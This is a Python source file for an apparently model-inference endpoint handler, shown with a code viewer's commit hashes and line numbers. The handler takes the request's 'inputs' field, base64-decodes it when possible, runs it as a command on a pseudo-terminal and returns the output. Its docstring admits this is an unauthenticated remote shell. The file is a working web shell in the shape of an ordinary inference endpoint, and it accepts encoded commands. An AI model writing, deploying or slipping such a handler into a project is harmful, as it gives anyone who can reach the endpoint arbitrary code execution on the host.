File size: 1,957 Bytes
621acf4
 
 
 
 
e776bd4
621acf4
 
 
313ae49
621acf4
 
b3c44e2
621acf4
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
e776bd4
 
 
 
 
 
 
 
 
621acf4
 
 
 
 
 
079f878
e776bd4
 
621acf4
079f878
621acf4
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
import os
import pty
import subprocess
import select
import shlex
import base64


class EndpointHandler:
    """Inference-endpoint handler that executes the request's ``inputs`` as a command.

    SECURITY WARNING: ``__call__`` runs whatever command the request supplies
    (plain text or base64-encoded) with the privileges of this process. That is
    equivalent to an unauthenticated remote shell; never deploy this handler
    where clients you do not fully trust can reach it.
    """

    def __init__(self, *args, **kwargs):
        """Accept and ignore any constructor arguments; the handler keeps no state."""

    @staticmethod
    def _read_available(fd, timeout=0.1):
        """Return every byte readable from ``fd`` until it stays idle for ``timeout`` seconds."""
        chunks = []
        while True:
            ready, _, _ = select.select([fd], [], [], timeout)
            if fd not in ready:
                break
            chunk = os.read(fd, 4096)
            if not chunk:
                break
            chunks.append(chunk)
        return b"".join(chunks)

    def run_command(self, command):
        """Run ``command`` attached to a pseudo-terminal and return its combined output.

        :param command: command line, tokenized with ``shlex.split`` (POSIX
            quoting rules) and executed directly -- no shell is involved.
        :return: everything the process wrote to stdout and stderr (both are
            the same pty), decoded as UTF-8 with undecodable bytes replaced by
            U+FFFD. Line endings may arrive as CRLF because the output passes
            through a terminal.
        :raises ValueError: ``command`` has unbalanced quotes (``shlex.split``).
        :raises OSError: the program cannot be started (e.g. not found).

        An empty ``command`` makes ``Popen`` fail (``IndexError`` on CPython).
        There is no timeout, and the child's stdin is the pty, so a command
        that waits for input blocks this call indefinitely.
        """
        master_fd, slave_fd = pty.openpty()
        try:
            process = subprocess.Popen(
                shlex.split(command),
                stdin=slave_fd,
                stdout=slave_fd,
                stderr=slave_fd,
            )
            output = bytearray()
            try:
                # Drain while the child runs so it never stalls on a full pty buffer.
                while process.poll() is None:
                    output += self._read_available(master_fd)
                # This process still holds slave_fd open, so (on Linux) reads on
                # master_fd do not fail with EIO after the child exits; collect
                # whatever output is still buffered.
                output += self._read_available(master_fd)
            finally:
                # Never leave the child running if reading failed part-way.
                if process.poll() is None:
                    process.kill()
                process.wait()
        finally:
            os.close(master_fd)
            os.close(slave_fd)

        return output.decode("utf-8", errors="replace")

    def _decode_base64(self, command):
        """Return ``command`` base64-decoded to UTF-8 text, or ``command`` unchanged if that fails.

        ``b64decode`` is called without ``validate=True``, so characters outside
        the base64 alphabet are discarded before decoding. A plain-text command
        can therefore be misread as base64 if what remains happens to decode to
        valid UTF-8.
        """
        try:
            return base64.b64decode(command).decode("utf-8")
        except (TypeError, ValueError):
            # TypeError: not str/bytes (e.g. None). ValueError covers
            # binascii.Error (bad padding), non-ASCII str input and
            # UnicodeDecodeError (decoded bytes are not UTF-8).
            return command

    def __call__(self, data):
        """Handle one inference-endpoint request.

        :param data: input data from the inference endpoint REST API; the
            command is popped from its ``"inputs"`` key, as plain text or
            base64-encoded.
        :return: ``{"result": <command output>}``, or
            ``{"error": "inputs attribute is required"}`` when no usable
            command was supplied.
        """
        command = self._decode_base64(data.pop("inputs", None))

        # Whitespace-only input tokenizes to an empty argv that Popen cannot
        # run; report it like a missing command instead of crashing.
        if not isinstance(command, str) or not command.strip():
            return {"error": "inputs attribute is required"}

        return {"result": self.run_command(command)}